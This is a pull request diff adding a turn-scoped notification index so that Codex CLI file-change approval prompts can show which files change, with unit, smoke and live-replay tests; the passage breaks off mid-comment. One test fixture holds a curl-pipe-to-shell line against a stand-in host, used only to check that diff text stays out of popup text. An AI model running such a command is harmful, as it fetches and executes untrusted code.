### PR TITLE
feat(codex cli): 신세대 파일변경 승인의 '무엇을 바꾸는가' 를 알아낸다 (#106 S2)

### DIFF
--- a/src/server/runtimes/codex/appServerClient.smoke.test.ts
+++ b/src/server/runtimes/codex/appServerClient.smoke.test.ts
@@ -46,6 +46,42 @@ it("interrupt: 진행 중 턴을 완전 멈춤", async () => {
   expect(r.status).toBe("interrupted");
 }, 90000);
 
+/**
+ * ★S2 배선 실증 — 알림 색인이 ★실제 클라이언트 코드 경로★ 에서 승인 요청에 붙는가.★
+ *
+ * 단위시험은 색인과 해석을 각각 검증하지만, ★둘을 잇는 세 줄(observe·beginTurn·lookup)★ 은
+ * 검증하지 못한다. 오늘 팀에서 배운 게 정확히 그거다 — ★"판정 로직만 파고 켤 수 있나를 아무도 안 물었다".★
+ * 그래서 진짜 codex 를 띄워 파일 수정을 시키고, onApproval 이 ★내용을 실제로 받는지★ 를 본다.
+ * ★승인은 무조건 거절★ 하므로 파일은 바뀌지 않는다(읽기전용 샌드박스 + denied).
+ */
+it("S2: 파일변경 승인요청에 observedItem 이 실려 온다(실물)", async () => {
+  const c = new CodexAppServerClient();
+  await c.start();
+  await c.startThread({ cwd: process.cwd(), approvalPolicy: "on-request", sandbox: "read-only" });
+  const seen: Array<{ method: string; hasItem: boolean; paths: string[]; itemIdMatches: boolean }> = [];
+  await c.runTurn(
+    "Create a file named s2_wiring_probe.txt containing HELLO in the current directory. Use apply_patch only. Do not run shell commands.",
+    {
+      onApproval: (req) => {
+        seen.push({
+          method: req.method,
+          hasItem: !!req.observedItem,
+          paths: req.observedItem?.changes.map((ch) => ch.path) ?? [],
+          itemIdMatches: req.observedItem?.itemId === (req.params as any)?.itemId,
+        });
+        return "denied"; // ★항상 거절 — 실제로 아무것도 쓰지 않는다★
+      },
+    },
+    90_000,
+  );
+  c.close();
+  const fileAsk = seen.find((s) => s.method === "item/fileChange/requestApproval");
+  expect(fileAsk).toBeDefined();
+  expect(fileAsk!.hasItem).toBe(true);           // ★짝짓기가 실물에서 성립★
+  expect(fileAsk!.itemIdMatches).toBe(true);
+  expect(fileAsk!.paths.some((p) => p.endsWith("s2_wiring_probe.txt"))).toBe(true);
+}, 120000);
+
 // M6 caller end-to-end (flag-on 경로 실증)
 import { runCodexTurnViaAppServer } from "./appServerRunner";
 it("M6 caller: runCodexTurnViaAppServer 무해 턴 → ok+reply", async () => {

--- a/src/server/runtimes/codex/appServerClient.ts
+++ b/src/server/runtimes/codex/appServerClient.ts
@@ -13,6 +13,7 @@ import { spawn, type ChildProcessWithoutNullStreams } from "node:child_process";
 import {
   classifyServerRequest, isApprovalKind, toInternalDecision, encodeApproval, failSafeNonApproval,
 } from "./serverRequestCodec";
+import { CodexTurnItemIndex, type ObservedItem } from "./appServerItemIndex";
 
 const CODEX_BIN = process.env.CODEX_BIN ?? "codex";
 const HANDSHAKE_TIMEOUT_MS = Number(process.env.B3OS_CODEX_APPSERVER_HANDSHAKE_MS ?? 45_000);
@@ -22,6 +23,15 @@ export interface ApprovalRequest {
   method: string; // execCommandApproval | applyPatchApproval | item/permissions/requestApproval | item/tool/requestUserInput ...
   params: Record<string, unknown>;
   serverRequestId?: string; // ★Phase1 ③: app-server JSON-RPC 요청 id — 팝업↔요청 1:1 상관키.★
+  /**
+   * ★S2(#106): 이 승인 요청보다 ★먼저 도착한 알림★ 에서 같은 itemId·같은 turn 으로 관측된 항목.★
+   *
+   * 신세대 `item/fileChange/requestApproval` 은 ★무엇을 바꾸는지 payload 에 담지 않는다★ — itemId 만 준다.
+   * 그리고 벤더 프로토콜에 ★item 을 id 로 조회하는 요청이 없다★(ClientRequest 전수 확인).
+   * 그래서 클라이언트가 알림을 색인해 두었다가 여기에 실어 준다. ★짝이 없으면 undefined★ — 상위는
+   * 그 경우 내용을 지어내지 말고 해석 실패(매번 묻기)로 처리해야 한다.
+   */
+  observedItem?: ObservedItem;
 }
 /** 승인 결정. codex ReviewDecision: approved(=이번만) | approved_for_session(=계속) | denied(=거절/이번만거절) | abort. */
 export type ReviewDecision = "approved" | "approved_for_session" | "denied" | "abort";
@@ -127,6 +137,9 @@ export class CodexAppServerClient {
     this.lastFinal = "";
     this.deltaBuf = ""; // ★턴 경계 버퍼 리셋(이전 턴 텍스트 누출 방지)★
     this.approvalWaits = 0; // ★턴 시작 시 승인 대기 ref-count 리셋(이전 턴 누수 방지)★
+    // ★S2: 이전 턴의 파일변경 관측을 버린다 — 이전 턴 내용이 이번 턴 승인에 붙으면 사람이 승인한 것과
+    //   실행되는 것이 갈린다. (조회 시 turnId 대조가 한 겹 더 막지만, 여기서 먼저 비운다.)★
+    this.itemIndex.beginTurn();
     return new Promise<TurnResult>((resolve) => {
       let settled = false;
       const finish = (r: TurnResult) => { if (settled) return; settled = true; this.clearTurnTimer(); this.turnResolve = null; this.activeHandlers = null; resolve(r); };
@@ -278,10 +291,13 @@ export class CodexAppServerClient {
       // 승인성: onApproval(사람 팝업 가능)로 내부 결정 → method별 codec 인코딩.
       const handler = this.activeHandlers?.onApproval;
       let decision: ReturnType<typeof toInternalDecision> = "decline"; // ★fail-closed 기본★
+      // ★S2: 이 승인이 가리키는 항목을 ★먼저 온 알림★ 에서 찾아 실어 준다(조회 요청이 없으므로 '기억' 으로).
+      //   같은 turn·같은 itemId 일 때만 붙는다 — 어긋나면 undefined 라 상위가 매번 묻는 경로로 간다.★
+      const observedItem = this.itemIndex.lookup(params?.itemId, params?.turnId) ?? undefined;
       // ★M5.3: 승인 대기(팝업) 동안 턴 타이머 정지 → 사람이 폰으로 승인하는 시간이 turn timeout에 안 잡힘.★
       this.pauseTurnTimer();
       try {
-        if (handler) decision = toInternalDecision(await handler({ method, params, serverRequestId: String(id) }));
+        if (handler) decision = toInternalDecision(await handler({ method, params, serverRequestId: String(id), observedItem }));
       } catch { decision = "decline"; }
       finally { this.resumeTurnTimer(); } // 결정 받으면 즉시 재개(예외에도 보장)
       const out = encodeApproval(kind, decision, params);
@@ -299,6 +315,9 @@ export class CodexAppServerClient {
 
   private handleNotification(method: string, params: any): void {
     this.activeHandlers?.onNotify?.(method, params);
+    // ★S2: 파일변경 항목을 itemId 로 색인해 둔다 — 승인 요청은 내용을 안 담아 오므로 여기서만 볼 수 있다.
+    //   파일변경과 무관한 알림은 observe 안에서 무시된다.★
+    this.itemIndex.observe(method, params);
     // ★견고성 #2 픽스: 턴 종료를 turn/completed 하나로만 인식하면 turn/failed·error·aborted에서 300초 hang.★
     // completed 외 turn-level 종료/에러 신호를 잡아 즉시 실패 종료(rate-limit 사유를 params에서 끌어올림).
     if ((method.startsWith("turn/") && /error|fail|abort|cancel/i.test(method)) || method === "error") {
@@ -352,6 +371,8 @@ export class CodexAppServerClient {
   private stderrTail = "";
   private rateLimitTail = "";
   private approvalWaits = 0; // 동시 승인 대기 ref-count(Phase1 ③) — 0일 때만 턴 타이머 재개.
+  /** ★S2: 파일변경 항목 turn 단위 색인 — 승인 요청에 내용이 없어 알림에서만 알 수 있다.★ */
+  private itemIndex = new CodexTurnItemIndex();
   private turnTimer: ReturnType<typeof setTimeout> | null = null;
   private turnTimeoutMs = 0;
   private armTurnTimer: (() => ReturnType<typeof setTimeout>) | null = null;

--- a/src/server/runtimes/codex/appServerItemIndex.test.ts
+++ b/src/server/runtimes/codex/appServerItemIndex.test.ts
@@ -1,0 +1,129 @@
+import { test, expect, describe } from "bun:test";
+import { CodexTurnItemIndex } from "./appServerItemIndex";
+
+/**
+ * ★S2a — turn 단위 알림 색인★
+ *
+ * 이 색인이 틀리면 ★사람이 승인한 것과 실제로 실행되는 것이 달라진다.★ 그래서 시험의 초점은
+ * '잘 찾는다' 가 아니라 ★'엉뚱한 것을 찾아주지 않는다'★ 다.
+ */
+const patch = (itemId: string, turnId: string, changes: unknown) => ({
+  method: "item/fileChange/patchUpdated",
+  params: { itemId, turnId, threadId: "th1", changes },
+});
+const oneChange = (path: string, type = "update") => [{ path, kind: { type }, diff: `--- a\n+++ b\n+x\n` }];
+
+describe("S2a — 알림 색인", () => {
+  test("patchUpdated 로 기억해 두면 같은 turn 의 itemId 로 꺼낼 수 있다", () => {
+    const idx = new CodexTurnItemIndex();
+    const m = patch("i1", "t1", oneChange("src/a.ts"));
+    idx.observe(m.method, m.params);
+    const hit = idx.lookup("i1", "t1");
+    expect(hit?.changes.map((c) => c.path)).toEqual(["src/a.ts"]);
+    expect(hit?.changes[0]?.kind).toBe("update");
+  });
+
+  test("item/started 의 fileChange 항목도 기억한다", () => {
+    const idx = new CodexTurnItemIndex();
+    idx.observe("item/started", {
+      turnId: "t1", threadId: "th1",
+      item: { id: "i9", type: "fileChange", status: "inProgress", changes: oneChange("src/b.ts", "add") },
+    });
+    expect(idx.lookup("i9", "t1")?.changes[0]?.kind).toBe("add");
+  });
+
+  test("파일변경이 아닌 item/started 는 기억하지 않는다", () => {
+    const idx = new CodexTurnItemIndex();
+    idx.observe("item/started", { turnId: "t1", item: { id: "i1", type: "commandExecution", command: "ls" } });
+    expect(idx.lookup("i1", "t1")).toBeNull();
+    expect(idx.size).toBe(0);
+  });
+
+  test("★다른 turn 의 항목은 짝이 아니다★ — 승인한 것과 실행되는 것이 갈리는 경로", () => {
+    const idx = new CodexTurnItemIndex();
+    const m = patch("i1", "t1", oneChange("src/a.ts"));
+    idx.observe(m.method, m.params);
+    expect(idx.lookup("i1", "t2")).toBeNull(); // 같은 itemId 라도 turn 이 다르면 안 준다
+    expect(idx.lookup("i1", "t1")).not.toBeNull();
+  });
+
+  test("★turnId 를 대조할 수 없으면 짝짓지 않는다★ — 통과가 아니라 ask", () => {
+    const idx = new CodexTurnItemIndex();
+    const m = patch("i1", "t1", oneChange("src/a.ts"));
+    idx.observe(m.method, m.params);
+    for (const bad of [undefined, null, "", 123, {}]) {
+      expect(idx.lookup("i1", bad)).toBeNull();
+    }
+  });
+
+  test("★관측에 turnId 가 없으면(알림이 malformed) 조회에 절대 안 걸린다★", () => {
+    const idx = new CodexTurnItemIndex();
+    idx.observe("item/fileChange/patchUpdated", { itemId: "i1", threadId: "th1", changes: oneChange("src/a.ts") });
+    expect(idx.size).toBe(1);          // 기억은 한다(진단용)
+    expect(idx.lookup("i1", "t1")).toBeNull(); // 그러나 짝은 안 된다 — null !== "t1"
+  });
+
+  test("turn 시작이면 이전 관측이 사라진다", () => {
+    const idx = new CodexTurnItemIndex();
+    const m = patch("i1", "t1", oneChange("src/a.ts"));
+    idx.observe(m.method, m.params);
+    idx.beginTurn();
+    expect(idx.size).toBe(0);
+    expect(idx.lookup("i1", "t1")).toBeNull();
+  });
+
+  test("같은 itemId 가 다시 오면 최신 내용으로 갈아끼운다", () => {
+    const idx = new CodexTurnItemIndex();
+    const a = patch("i1", "t1", oneChange("old.ts"));
+    const b = patch("i1", "t1", oneChange("new.ts"));
+    idx.observe(a.method, a.params);
+    idx.observe(b.method, b.params);
+    expect(idx.lookup("i1", "t1")?.changes.map((c) => c.path)).toEqual(["new.ts"]);
+    expect(idx.size).toBe(1);
+  });
+
+  test("★빈 변경목록은 기억하지 않는다★ — '내용 없는 승인' 을 만들지 않기 위해", () => {
+    const idx = new CodexTurnItemIndex();
+    for (const empty of [[], undefined, null, "nope", [{ kind: { type: "add" } }]]) {
+      idx.observe("item/fileChange/patchUpdated", { itemId: "i1", turnId: "t1", changes: empty });
+    }
+    expect(idx.size).toBe(0);
+    expect(idx.lookup("i1", "t1")).toBeNull();
+  });
+
+  test("모양이 어긋난 원소는 버리고 성한 것만 남긴다 — 추측해서 채우지 않는다", () => {
+    const idx = new CodexTurnItemIndex();
+    idx.observe("item/fileChange/patchUpdated", {
+      itemId: "i1", turnId: "t1",
+      changes: [
+        { path: "ok.ts", kind: { type: "update", move_path: "moved.ts" }, diff: "d" },
+        { path: "", kind: { type: "add" }, diff: "d" },   // path 없음 → 버림
+        { kind: { type: "add" } },                          // path 없음 → 버림
+        { path: "nokind.ts", diff: "d" },                   // kind 모양 어긋남 → unknown 으로 남김
+      ],
+    });
+    const hit = idx.lookup("i1", "t1")!;
+    expect(hit.changes.map((c) => c.path)).toEqual(["ok.ts", "nokind.ts"]);
+    expect(hit.changes[0]?.movePath).toBe("moved.ts");
+    expect(hit.changes[1]?.kind).toBe("unknown");
+  });
+
+  test("상한을 넘으면 오래된 것부터 버린다 — 버려진 것은 ask 로 떨어진다", () => {
+    const idx = new CodexTurnItemIndex();
+    for (let i = 0; i < 300; i++) {
+      idx.observe("item/fileChange/patchUpdated", { itemId: `i${i}`, turnId: "t1", changes: oneChange(`f${i}.ts`) });
+    }
+    expect(idx.size).toBe(256);
+    expect(idx.lookup("i0", "t1")).toBeNull();     // 가장 오래된 것 = 버려짐
+    expect(idx.lookup("i299", "t1")).not.toBeNull(); // 최신은 남음
+  });
+
+  test("diff 는 상한까지만 보관한다", () => {
+    const idx = new CodexTurnItemIndex();
+    idx.observe("item/fileChange/patchUpdated", {
+      itemId: "i1", turnId: "t1",
+      changes: [{ path: "big.ts", kind: { type: "update" }, diff: "x".repeat(50_000) }],
+    });
+    expect(idx.lookup("i1", "t1")!.changes[0]!.diff.length).toBe(20_000);
+  });
+});

--- a/src/server/runtimes/codex/appServerItemIndex.ts
+++ b/src/server/runtimes/codex/appServerItemIndex.ts
@@ -1,0 +1,145 @@
+/**
+ * ★S2(#106) — 신세대 파일변경 승인의 '무엇을 바꾸는가' 를 알아내기 위한 turn 단위 알림 색인.★
+ *
+ * ■ 왜 필요한가
+ * 구세대 `applyPatchApproval` 은 승인 요청 안에 `fileChanges` 가 들어 있었다. 그런데 신세대
+ * `item/fileChange/requestApproval` 은 ★내용을 담지 않는다★ — params 는 {itemId, turnId, threadId,
+ * startedAtMs, reason?, grantRoot?} 뿐이다(codex-cli 0.144.6 벤더 스키마 실측).
+ * 그래서 지금은 그 승인이 통째로 '해석 실패' 로 떨어져, 사람이 ★무슨 파일을 바꾸는지 볼 수 없다.★
+ *
+ * ■ ★설계 정정(2026-07-29): '조회' 가 아니라 '기억' 이다★
+ * 처음 계획은 "itemId 로 실제 변경을 조회한다" 였는데, ★벤더 프로토콜에 item 을 id 로 가져오는 요청이
+ * 아예 없다★(ClientRequest 전수 확인). 대신 내용이 ★알림으로 먼저 온다★:
+ *   item/started                 → item.type==="fileChange" 이면 item.changes 동봉
+ *   item/fileChange/patchUpdated → changes 갱신본
+ * 따라서 ★먼저 온 알림을 itemId 로 기억해 두었다가 승인 시점에 짝짓는다.★
+ * (이 착각을 코드 다 쓰고 스위치 켠 뒤에 알았으면 훨씬 비쌌다 — '켜서 도는지 먼저 본다' 가 잡아줬다.)
+ *
+ * ■ ★안전 불변식 — 애매하면 통과가 아니라 ask (팀 리드 원칙 2026-07-28)★
+ *  1. ★turn 이 다르면 짝이 아니다.★ 항목마다 turnId 를 함께 저장하고 조회 때 대조한다. 게다가 턴 시작마다
+ *     통째로 비운다. 이전 턴의 변경 내용이 다음 턴 승인에 붙으면 ★사람이 승인한 것과 실행되는 것이 달라진다.★
+ *  2. ★짝이 없으면 만들어내지 않는다.★ 알림을 못 봤거나 순서가 뒤집혔으면 null 을 돌려주고, 호출부는
+ *     해석 실패 경로(매번 묻기)로 보낸다. 알림 도착 순서는 계약이 아니므로 ★못 볼 수 있다고 가정한다.★
+ *  3. ★무한히 쌓지 않는다.★ 상한을 두고 오래된 것부터 버린다. 버려진 항목은 '짝 없음' 이 되어 ask 로
+ *     떨어지므로 ★버리는 방향이 안전한 방향★ 이다.
+ *
+ * ★이 모듈은 순수 상태 컨테이너다 — I/O 없음. appServerClient 가 알림을 넣고 승인 시점에 꺼낸다.★
+ */
+
+/** 변경 한 건 — 벤더 FileUpdateChange {path, kind, diff} 를 우리 쪽 좁은 모양으로 정규화. */
+export interface ObservedFileChange {
+  path: string;
+  /** add | delete | update | unknown — PatchChangeKind.type */
+  kind: string;
+  /** update 이면서 이동을 겸하는 경우의 목적지(move_path). 없으면 null. */
+  movePath: string | null;
+  /** unified diff 원문(상한 절단). 사람 표시가 아니라 ★내용 지문·줄수 계산용★. */
+  diff: string;
+}
+
+/** 승인 요청보다 먼저 관측된 항목 하나. */
+export interface ObservedItem {
+  itemId: string;
+  turnId: string | null;
+  threadId: string | null;
+  changes: ObservedFileChange[];
+}
+
+/** 한 diff 당 보관 상한(메모리 보호). 지문·줄수 계산에만 쓰므로 절단돼도 판단이 넓어지지 않는다. */
+const MAX_DIFF_CHARS = 20_000;
+/** 색인 항목 수 상한. 넘으면 ★가장 오래 전에 넣은 것부터★ 버린다(버려지면 ask 로 떨어진다 = 안전). */
+const MAX_ITEMS = 256;
+
+export class CodexTurnItemIndex {
+  /** 삽입 순서가 보존되는 Map — 상한 초과 시 가장 앞(=가장 오래된) 것을 버린다. */
+  private items = new Map<string, ObservedItem>();
+
+  /**
+   * 서버 알림 하나를 반영한다. 파일변경과 무관한 알림은 그냥 무시한다.
+   * ★같은 itemId 로 다시 오면 최신 내용으로 갈아끼운다★ — patchUpdated 가 갱신본이기 때문.
+   */
+  observe(method: string, params: unknown): void {
+    const p = (params ?? {}) as Record<string, any>;
+    if (method === "item/fileChange/patchUpdated") {
+      this.put(p.itemId, p.turnId, p.threadId, p.changes);
+      return;
+    }
+    if (method === "item/started") {
+      const item = p.item as Record<string, any> | undefined;
+      if (item?.type === "fileChange") this.put(item.id, p.turnId, p.threadId, item.changes);
+      return;
+    }
+    if (method === "item/completed") {
+      // 완료본도 changes 를 싣는다. 승인은 보통 완료 전에 오지만, 갱신되면 최신을 쓴다.
+      const item = p.item as Record<string, any> | undefined;
+      if (item?.type === "fileChange") this.put(item.id, p.turnId, p.threadId, item.changes);
+    }
+  }
+
+  private put(itemId: unknown, turnId: unknown, threadId: unknown, changes: unknown): void {
+    if (typeof itemId !== "string" || !itemId) return;
+    const normalized = normalizeChanges(changes);
+    // ★빈 변경목록은 기억하지 않는다★ — 기억해두면 조회에 '성공' 하면서 내용이 없어,
+    //   호출부가 '파일 0개 쓰기' 라는 ★내용 없는 승인★ 을 만들 수 있다. 없는 것으로 두면 ask 로 간다.
+    if (normalized.length === 0) return;
+    if (this.items.has(itemId)) this.items.delete(itemId); // 재삽입 = 최신으로 취급(순서도 갱신)
+    this.items.set(itemId, {
+      itemId,
+      turnId: typeof turnId === "string" ? turnId : null,
+      threadId: typeof threadId === "string" ? threadId : null,
+      changes: normalized,
+    });
+    while (this.items.size > MAX_ITEMS) {
+      const oldest = this.items.keys().next();
+      if (oldest.done) break;
+      this.items.delete(oldest.value);
+    }
+  }
+
+  /**
+   * 승인 요청과 짝지을 항목을 꺼낸다. ★turn 이 어긋나면 짝이 아니다.★
+   *
+   * turnId 대조를 하는 이유: 턴 경계 초기화만으로는 부족하다 — 초기화 신호(turn/started)를 놓치거나
+   * 순서가 뒤집히면 ★이전 턴 내용이 살아남는다.★ 두 겹으로 막는다.
+   * 승인 요청에 turnId 가 없으면(구세대·malformed) ★짝짓지 않는다★ — 대조할 수 없으면 통과가 아니라 ask.
+   */
+  lookup(itemId: unknown, turnId: unknown): ObservedItem | null {
+    if (typeof itemId !== "string" || !itemId) return null;
+    const hit = this.items.get(itemId);
+    if (!hit) return null;
+    if (typeof turnId !== "string" || !turnId) return null;
+    if (hit.turnId !== turnId) return null;
+    return hit;
+  }
+
+  /** 턴 시작 — 이전 턴 관측을 통째로 버린다. */
+  beginTurn(): void {
+    this.items.clear();
+  }
+
+  /** 관측 항목 수(테스트·진단용). */
+  get size(): number {
+    return this.items.size;
+  }
+}
+
+/** 벤더 changes 배열 → 좁은 모양. 모양이 어긋난 원소는 ★버린다★(추측해서 채우지 않는다). */
+function normalizeChanges(raw: unknown): ObservedFileChange[] {
+  if (!Array.isArray(raw)) return [];
+  const out: ObservedFileChange[] = [];
+  for (const c of raw) {
+    if (!c || typeof c !== "object") continue;
+    const rec = c as Record<string, any>;
+    if (typeof rec.path !== "string" || !rec.path) continue;
+    const kindObj = rec.kind;
+    const kind = kindObj && typeof kindObj === "object" && typeof kindObj.type === "string" ? kindObj.type : "unknown";
+    const movePath = kindObj && typeof kindObj === "object" && typeof kindObj.move_path === "string" ? kindObj.move_path : null;
+    out.push({
+      path: rec.path,
+      kind,
+      movePath,
+      diff: typeof rec.diff === "string" ? rec.diff.slice(0, MAX_DIFF_CHARS) : "",
+    });
+  }
+  return out;
+}

--- a/src/server/runtimes/codex/appServerPopup.s2.test.ts
+++ b/src/server/runtimes/codex/appServerPopup.s2.test.ts
@@ -1,0 +1,239 @@
+import { test, expect, describe } from "bun:test";
+import { buildOperationFromApproval, approvalOperationHash } from "./appServerPopup";
+import { scopeKeyForOperation, targetForOperation } from "../../lib/permissionGate";
+import type { ApprovalRequest } from "./appServerClient";
+import { CodexTurnItemIndex, type ObservedItem } from "./appServerItemIndex";
+
+/**
+ * ★S2(#106) — 신세대 파일변경 승인을 실제 내용으로 해석한다★
+ *
+ * 신세대 `item/fileChange/requestApproval` 은 ★무엇을 바꾸는지 payload 에 담지 않는다★(itemId 만).
+ * 그리고 ★벤더 프로토콜에 item 을 id 로 조회하는 요청이 없다★ — 그래서 ★먼저 온 알림을 기억해 짝짓는다.★
+ * (계획서에 "itemId 로 조회한다" 고 적었던 것이 없는 기능이었다. 켜보기 전에 스키마를 세어 발견했다.)
+ */
+/**
+ * ★fixture 는 라이브 실측 모양을 따른다(2026-07-29 codex-cli 0.144.6).★
+ *   update → `@@ -1,4 +1,3 @@\n alpha\n-bravo\n+BRAVO\n` (통일diff)
+ *   add    → `HELLO\n` (파일 원문 — `+` 도 `@@` 도 없다)
+ * 지어낸 모양으로 시험하면 ★시험만 통과하고 실물에서 틀린다★ — 오늘 이 형태를 여러 번 봤다.
+ */
+const observed = (paths: Array<[string, string, number]>, turnId = "t1", itemId = "i1"): ObservedItem => ({
+  itemId, turnId, threadId: "th1",
+  changes: paths.map(([path, kind, adds]) => ({
+    path, kind, movePath: null,
+    diff: kind === "add"
+      ? Array.from({ length: adds }, (_, i) => `line${i}`).join("\n") + "\n"
+      : `@@ -1,${adds} +1,${adds} @@\n` + Array.from({ length: adds }, (_, i) => `+line${i}`).join("\n") + "\n",
+  })),
+});
+const fileReq = (observedItem?: ObservedItem, extra: Record<string, unknown> = {}): ApprovalRequest => ({
+  method: "item/fileChange/requestApproval",
+  params: { itemId: observedItem?.itemId ?? "i1", turnId: "t1", threadId: "th1", startedAtMs: 1, ...extra },
+  observedItem,
+});
+
+describe("S2 — 신세대 파일변경 승인 해석", () => {
+  test("★짝지어진 알림이 있으면 실제 파일을 쓰기 작업으로 해석한다★", () => {
+    const op = buildOperationFromApproval(fileReq(observed([["src/a.ts", "update", 3]])), "dex");
+    expect(op.action).toBe("write");
+    expect(op.path).toBe("src/a.ts");
+    expect(targetForOperation(op)).toBe("src/a.ts"); // 지문이 아니라 사람이 읽는 경로
+  });
+
+  test("사람이 규모를 볼 수 있다 — 종류·경로·줄수 요약", () => {
+    const op = buildOperationFromApproval(
+      fileReq(observed([["src/b.ts", "add", 12], ["src/a.ts", "update", 2]])), "dex");
+    expect(op.text).toContain("파일 2개");
+    expect(op.text).toContain("add src/b.ts(+12/-0)");
+    expect(op.text).toContain("update src/a.ts(+2/-0)");
+  });
+
+  test("★짝이 없으면 내용을 지어내지 않는다 — 매번 묻는 경로로 간다★", () => {
+    const op = buildOperationFromApproval(fileReq(undefined), "dex");
+    expect(op.action).toBe("approval_unparsed");
+    expect(targetForOperation(op)).toMatch(/#[0-9a-f]{16}/);
+  });
+
+  test("★관측은 됐는데 변경이 비어 있으면 '내용 없는 쓰기 승인' 을 만들지 않는다★", () => {
+    const empty: ObservedItem = { itemId: "i1", turnId: "t1", threadId: "th1", changes: [] };
+    expect(buildOperationFromApproval(fileReq(empty), "dex").action).toBe("approval_unparsed");
+  });
+
+  test("같은 파일집합은 같은 열쇠 · 다른 파일집합은 다른 열쇠 — '항상 허용' 이 의미를 갖는다", () => {
+    const a = buildOperationFromApproval(fileReq(observed([["src/a.ts", "update", 1]])), "dex");
+    const a2 = buildOperationFromApproval(fileReq(observed([["src/a.ts", "update", 99]])), "dex"); // 내용만 다름
+    const b = buildOperationFromApproval(fileReq(observed([["src/b.ts", "update", 1]])), "dex");
+    expect(scopeKeyForOperation(a)).toBe(scopeKeyForOperation(a2)); // 열쇠 단위 = 파일, 내용 아님
+    expect(scopeKeyForOperation(a)).not.toBe(scopeKeyForOperation(b));
+  });
+
+  test("★새 파일 생성이 '(+0/-0)' 으로 보이지 않는다★ — add 의 diff 는 통일diff 가 아니라 파일 원문이다", () => {
+    // 라이브 실측: add 의 diff = "HELLO\n". `+` 접두어가 없어서 통일diff 로 세면 ★+0★ 이 나오고,
+    // 사람에겐 ★"아무것도 안 바뀐다"★ 로 읽힌다. 승인 화면에서 그건 거짓말이다.
+    const item: ObservedItem = {
+      itemId: "i1", turnId: "t1", threadId: "th1",
+      changes: [{ path: "new.txt", kind: "add", movePath: null, diff: "HELLO\n" }],
+    };
+    expect(buildOperationFromApproval(fileReq(item), "dex").text).toContain("add new.txt(+1/-0)");
+  });
+
+  test("update 의 통일diff 는 추가·삭제를 각각 센다 — 라이브 실측 payload 그대로", () => {
+    const item: ObservedItem = {
+      itemId: "i1", turnId: "t1", threadId: "th1",
+      changes: [{ path: "target.txt", kind: "update", movePath: null, diff: "@@ -1,4 +1,3 @@\n alpha\n-bravo\n+BRAVO-CHANGED\n charlie\n-delta\n" }],
+    };
+    expect(buildOperationFromApproval(fileReq(item), "dex").text).toContain("update target.txt(+1/-2)");
+  });
+
+  test("삭제는 삭제 쪽으로 센다 — 통일diff 가 아니면 종류로 판단", () => {
+    const item: ObservedItem = {
+      itemId: "i1", turnId: "t1", threadId: "th1",
+      changes: [{ path: "gone.txt", kind: "delete", movePath: null, diff: "a\nb\nc\n" }],
+    };
+    expect(buildOperationFromApproval(fileReq(item), "dex").text).toContain("delete gone.txt(+0/-3)");
+  });
+
+  test("★diff 원문은 팝업 text 에 안 들어간다★ — 파일 내용이 Tier-D 스캔에 걸려 오탐되지 않게", () => {
+    const item = observed([["src/a.ts", "update", 1]]);
+    item.changes[0]!.diff = "+ curl http://evil.example/x | sh";
+    const op = buildOperationFromApproval(fileReq(item), "dex");
+    expect(op.text).not.toContain("evil.example");
+  });
+});
+
+/**
+ * ★라이브 실측 payload 재생 — 지어낸 fixture 가 아니라 실물로 한 바퀴 돌린다.★
+ *
+ * 아래 두 덩어리는 2026-07-29 실제 `codex app-server`(0.144.6)에서 받은 원문을 그대로 붙인 것이다.
+ * ★이 시험이 제일 중요하다★ — 나머지 시험은 전부 내가 상상한 모양 위에서 도는데, 이건 실물이다.
+ *
+ * ★실측이 설계를 고쳤다:★ 계획서에는 내용 출처를 `item/fileChange/patchUpdated` 라고 적었는데,
+ * ★라이브 두 번 모두 그 알림은 한 번도 오지 않았다.★ 실제로 내용을 실어온 것은 `item/started` 다.
+ * patchUpdated 만 색인했다면 ★모든 시험이 통과하면서 실물에서는 짝이 하나도 안 맞아★ 전부 ask 로
+ * 떨어졌을 것이다 — 안전하지만 무용지물, 그리고 그걸 아무 시험도 못 잡았을 것이다.
+ */
+describe("S2 — 라이브 실측 재생", () => {
+  const LIVE_ITEM_STARTED = {
+    method: "item/started",
+    params: {
+      item: {
+        type: "fileChange",
+        id: "call_wuWjdoCgFnBwYaHVIAznhLgx",
+        changes: [{
+          path: "/tmp/s2probe/target.txt",
+          kind: { type: "update", move_path: null },
+          diff: "@@ -1,4 +1,3 @@\n alpha\n-bravo\n+BRAVO-CHANGED\n charlie\n-delta\n",
+        }],
+        status: "inProgress",
+      },
+      threadId: "019fac43-c063-7191-8b8d-8eee5e1e31fd",
+      turnId: "019fac43-c0ee-78e3-adec-58245282d448",
+      startedAtMs: 1785301553644,
+    },
+  };
+  const LIVE_APPROVAL: ApprovalRequest = {
+    method: "item/fileChange/requestApproval",
+    params: {
+      threadId: "019fac43-c063-7191-8b8d-8eee5e1e31fd",
+      turnId: "019fac43-c0ee-78e3-adec-58245282d448",
+      itemId: "call_wuWjdoCgFnBwYaHVIAznhLgx",
+      startedAtMs: 1785301553644,
+      reason: null,
+      grantRoot: null,
+    },
+  };
+
+  test("★실물 알림 → 실물 승인요청이 짝지어져 사람이 읽을 수 있는 팝업이 된다★", () => {
+    const idx = new CodexTurnItemIndex();
+    idx.observe(LIVE_ITEM_STARTED.method, LIVE_ITEM_STARTED.params);
+    const hit = idx.lookup(LIVE_APPROVAL.params.itemId, LIVE_APPROVAL.params.turnId);
+    expect(hit).not.toBeNull(); // ★여기가 깨지면 실물에서 전부 ask 로 떨어진다★
+    const op = buildOperationFromApproval({ ...LIVE_APPROVAL, observedItem: hit! }, "dex");
+    expect(op.action).toBe("write");
+    expect(op.path).toBe("/tmp/s2probe/target.txt");
+    expect(op.text).toContain("update /tmp/s2probe/target.txt(+1/-2)");
+    expect(op.provenance?.grant_root).toBeNull();
+  });
+
+  test("★실물 turnId 가 다르면 짝이 아니다★ — 값 모양(uuid)까지 실물로 확인", () => {
+    const idx = new CodexTurnItemIndex();
+    idx.observe(LIVE_ITEM_STARTED.method, LIVE_ITEM_STARTED.params);
+    expect(idx.lookup(LIVE_APPROVAL.params.itemId, "019fac43-0000-0000-0000-000000000000")).toBeNull();
+  });
+});
+
+/**
+ * ★grantRoot — 파일 몇 개가 아니라 '폴더 하위 전체를 세션 동안' 이다.★
+ *
+ * 벤더 설명: "the agent is asking the user to allow writes under this root for the remainder of the session".
+ * ★변경 전 정본(4430021)에서 실측한 실제 구멍★: grantRoot 가 있든 없든 ★열쇠도 지문도 완전히 같았다★
+ * (둘 다 target="a.ts|b.ts", 지문 c7fa63459c642993). 즉 파일 2개에 준 '항상 허용' 이 ★루트 전체 승인★ 에
